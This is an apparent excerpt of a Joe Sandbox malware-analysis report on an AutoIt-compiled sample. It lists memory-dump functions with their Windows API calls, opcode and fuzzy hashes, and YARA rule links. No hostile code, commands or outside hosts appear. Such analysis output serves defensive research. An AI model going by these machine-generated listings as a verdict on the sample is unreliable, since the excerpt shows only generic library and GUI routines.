Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 861bcd340fe16764386f0d94fd2e577cc824c97fba6983545ab4ee3b98422613
Instruction ID: b17ac8ced45c24d09094d279ec54515440c0ad13e97c98617a6fa45d94895a37
Opcode Fuzzy Hash: 861bcd340fe16764386f0d94fd2e577cc824c97fba6983545ab4ee3b98422613
Instruction Fuzzy Hash: 08116A312147019FD7248F05C8A0BA2B7F8AF54350F10C42DE99B86650C7B1A899CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00245000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00244C7D: RtlAllocateHeap.NTDLL(00000008,00211129,00000000,?,00242E29,00000001,00000364,?,?,?,0023F2DE,00243863,002E1444,?,0022FDF5,?), ref: 00244CBE

_free.LIBCMT ref: 0024506C

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction ID: 2eb01e6a4d5cc4336b4406e2eaa475b9bd2dab29ca5adf5d84162f8952053c47
Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction Fuzzy Hash: A6012676214705ABE3258E65D881A9AFBE9FB89370F65051DE1C483281EA70A805CAB4

Uniqueness

Uniqueness Score: -1.00%

Function 0023E469 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 0023E4BE

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
Instruction ID: 69287fb47f3cdb4bbdd243c7dfde9eefa11f25c0012ba63d61e9a848a9486cb4
Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
Instruction Fuzzy Hash: 5B01D8B1930348AFDF24DFA4CC457AEB7ECEB44325F51856EF41597140D6719D148B60

Uniqueness

Uniqueness Score: -1.00%

Function 0023E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction ID: 9d218cd255104d0fb51b36a3b63983385fe35861ca83565b73faad6888678638
Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction Fuzzy Hash: 32F028B2530A14D7DF353E6A9C06B5B339C9F52335F12071AF920971D2CB70D8298EA5

Uniqueness

Uniqueness Score: -1.00%

Function 00244C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00211129,00000000,?,00242E29,00000001,00000364,?,?,?,0023F2DE,00243863,002E1444,?,0022FDF5,?), ref: 00244CBE

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d2f429c324d6b89c9db48833917326ade2f70f6d96fb8e115661ea9532ae79fc
Instruction ID: 2ea184a8c0d6286883addbcfdac7195d847100242985dd379999a348518bb76b
Opcode Fuzzy Hash: d2f429c324d6b89c9db48833917326ade2f70f6d96fb8e115661ea9532ae79fc
Instruction Fuzzy Hash: 0EF0E931632225A7DB297F62EC89B5B3788BF417A1F1C4123FC19AA190CA70D8304AE0

Uniqueness

Uniqueness Score: -1.00%

Function 00243820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,002E1444,?,0022FDF5,?,?,0021A976,00000010,002E1440,002113FC,?,002113C6,?,00211129), ref: 00243852

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 32d4f6a24b633776fa06f48f4e94b4a8e46a33ca6f6607cdce7cd02d738112c2
Instruction ID: 185ad9c37776bcef0ee58cd49e8f00a044a8b51f54b9963bd98912fdc0ff493f
Opcode Fuzzy Hash: 32d4f6a24b633776fa06f48f4e94b4a8e46a33ca6f6607cdce7cd02d738112c2
Instruction Fuzzy Hash: 36E02B3253022697D735BE77AC04B9BB74AAF427B0F150032BC1496490DB61ED3189E0

Uniqueness

Uniqueness Score: -1.00%

Function 00244D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00244D9C

Part of subcall function 002429C8: HeapFree.KERNEL32(00000000,00000000), ref: 002429DE
Part of subcall function 002429C8: GetLastError.KERNEL32(00000000,?,0024D7D1,00000000,00000000,00000000,00000000,?,0024D7F8,00000000,00000007,00000000,?,0024DBF5,00000000,00000000), ref: 002429F0

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction ID: bd58201c4a6446648a93ab37398143fa3b8fa341850553ca321c055c7133f966
Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction Fuzzy Hash: F2E09236110305DF8724DF6DD400A82B7F4EF843207208529F99DD3310D331E822CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00214F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214F6D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 7ee5f0f6859e16bd38e1548bc46d03f422f0e32ff23b9e9e0b19064fe9a683a4
Instruction ID: 4aa9761a5f0506d43a5ae5df6848478c1409a65839848d995dee946fe344f535
Opcode Fuzzy Hash: 7ee5f0f6859e16bd38e1548bc46d03f422f0e32ff23b9e9e0b19064fe9a683a4
Instruction Fuzzy Hash: 6AF0A070125302CFCB34AF20D490892B7E4FF20319320897EE1DE86A10C7319899DF00

Uniqueness

Uniqueness Score: -1.00%

Function 00212DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00212DC4

Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 7e502d757d682a90ac21ed3f62666d674ffb5639456cf943fbb9903ebd32d7b3
Instruction ID: 27301cd435283ad3238cc8fab5b61120867e6bed3f134b9e35397e03bd5c5815
Opcode Fuzzy Hash: 7e502d757d682a90ac21ed3f62666d674ffb5639456cf943fbb9903ebd32d7b3
Instruction Fuzzy Hash: E1E0CD726042245BC72092589C09FEA77DDDFC8790F050071FD09E7248D970AD948950

Uniqueness

Uniqueness Score: -1.00%

Function 00282693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 002826B5

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: d5e2f09d91c0e786cf93ca2a6d9cdeaef96cbf7d221bc4d475a97db637bf1049
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: E3E048B461A7109FDF396E28A8517B677D89F49300F00045EF59B82252E57268558B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00212B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00213837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00213908

Part of subcall function 0021D730: GetInputState.USER32 ref: 0021D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00212B6B

Part of subcall function 002130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0021314E

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 2a0bce2f2a78fcd5f82a122f930f7ccaf44215a4c169115b91044a4d121ff006
Instruction ID: 779b4a871edb0532a56f7e0c205b4a1a660b2f01f1aac0f523ad737b3d7ae1cb
Opcode Fuzzy Hash: 2a0bce2f2a78fcd5f82a122f930f7ccaf44215a4c169115b91044a4d121ff006
Instruction Fuzzy Hash: F7E0263132424403CA04FB30B8565EDA3DA8BF5311F40043EF142872A2CE208AF94B52

Uniqueness

Uniqueness Score: -1.00%

Function 0025039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00250704,?,?,00000000), ref: 002503B7

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ea445002bde49c3bab3b454ef7d9199a287928bad6714478596c5aa06edc7ead
Instruction ID: baf01df59aeb1f0ddb872ee9a0a888fd997e8c638a3b74c3c9c3c5667d799167
Opcode Fuzzy Hash: ea445002bde49c3bab3b454ef7d9199a287928bad6714478596c5aa06edc7ead
Instruction Fuzzy Hash: 34D06C3214020DBBDF028F84ED06EDA3BAAFB48714F114000BE1856020CB36E821AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00211CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 00211CBC

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 9d8edaa66bf0d57f85305a81de76b189912025cc34347705034425a56d15a6a1
Instruction ID: b8d2a3d7b9bf0a8ebf5aab62fa176ab5279e0799d613d512b71a994a616bb274
Opcode Fuzzy Hash: 9d8edaa66bf0d57f85305a81de76b189912025cc34347705034425a56d15a6a1
Instruction Fuzzy Hash: CBC09B352C0344DFF2144780BD8EF107754E348B00F944001F6097D5E3C7B11820D650

Uniqueness

Uniqueness Score: -1.00%

Function 0028744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00215745: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00215773

GetLastError.KERNEL32(00000002,00000000), ref: 002876DE

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 2ae8eeab81141972dc06e809034aeaeaa7cebcd649b96db030e94ef754577b6c
Instruction ID: 25e7b7f26904bf4f70280b0b6378bcf5cb6b83b5819e4fa314aaedd2617dfc15
Opcode Fuzzy Hash: 2ae8eeab81141972dc06e809034aeaeaa7cebcd649b96db030e94ef754577b6c
Instruction Fuzzy Hash: 6081F1342297019FC714EF28C491AA9B3E5BF98300F14456DF8995B2E2DB30EDA4CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0022FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 0022FD1F

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: e53871c892490df35fb937634024e7100e05f554429e4b80c7fd6e4752fb46d1
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1B310674A1011AABD758CF99E690969F7B1FF49300B2482B6E809CB752D731EDE1CBC0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002A9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00229BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00229BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 002A961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002A965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 002A969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002A96C9
SendMessageW.USER32 ref: 002A96F2
GetKeyState.USER32(00000011), ref: 002A978B
GetKeyState.USER32(00000009), ref: 002A9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002A97AE
GetKeyState.USER32(00000010), ref: 002A97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002A97E9
SendMessageW.USER32 ref: 002A9810
SendMessageW.USER32(?,00001030,?,002A7E95), ref: 002A9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 002A992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002A9941
SetCapture.USER32(?), ref: 002A994A
ClientToScreen.USER32(?,?), ref: 002A99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002A99BC
InvalidateRect.USER32(?,00000000,00000001), ref: 002A99D6
ReleaseCapture.USER32 ref: 002A99E1
GetCursorPos.USER32(?), ref: 002A9A19
ScreenToClient.USER32(?,?), ref: 002A9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 002A9A80
SendMessageW.USER32 ref: 002A9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 002A9AEB
SendMessageW.USER32 ref: 002A9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002A9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 002A9B4A
GetCursorPos.USER32(?), ref: 002A9B68
ScreenToClient.USER32(?,?), ref: 002A9B75
GetParent.USER32(?), ref: 002A9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 002A9BFA
SendMessageW.USER32 ref: 002A9C2B
ClientToScreen.USER32(?,?), ref: 002A9C84
TrackPopupMenuEx.USER32 ref: 002A9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 002A9CDE
SendMessageW.USER32 ref: 002A9D01
ClientToScreen.USER32(?,?), ref: 002A9D4E
TrackPopupMenuEx.USER32 ref: 002A9D82

Part of subcall function 00229944: GetWindowLongW.USER32(?,000000EB), ref: 00229952

GetWindowLongW.USER32(?,000000F0), ref: 002A9E05

Strings

F, xrefs: 002A9D07
p#., xrefs: 002A9990
@GUI_DRAGID, xrefs: 002A997D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#.
API String ID: 3429851547-937396290
Opcode ID: a1a5f1595924ff8359a1c2b7bfb224fd3781551a97604a58a576c8cadaa1e73a
Instruction ID: 6afb493ba5878830b353c114947476335c2776e8426238414fad6b4f180f3f4c
Opcode Fuzzy Hash: a1a5f1595924ff8359a1c2b7bfb224fd3781551a97604a58a576c8cadaa1e73a
Instruction Fuzzy Hash: 3D42AF34614241AFD724CF25DC88EAABBE9FF8A710F200619F659872A1DB71D8B4CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002A4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 002A48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 002A4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 002A4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 002A494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 002A495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 002A497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 002A49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 002A49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 002A4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 002A4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 002A4A7E
IsMenu.USER32(?), ref: 002A4A97
GetMenuItemInfoW.USER32 ref: 002A4AF2
GetMenuItemInfoW.USER32 ref: 002A4B20
GetWindowLongW.USER32(?,000000F0), ref: 002A4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 002A4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 002A4C82
wsprintfW.USER32 ref: 002A4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002A4CC9
GetWindowTextW.USER32 ref: 002A4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002A4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002A4D33
GetWindowTextW.USER32 ref: 002A4D5A

Strings

%d/%02d/%02d, xrefs: 002A4CA8

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
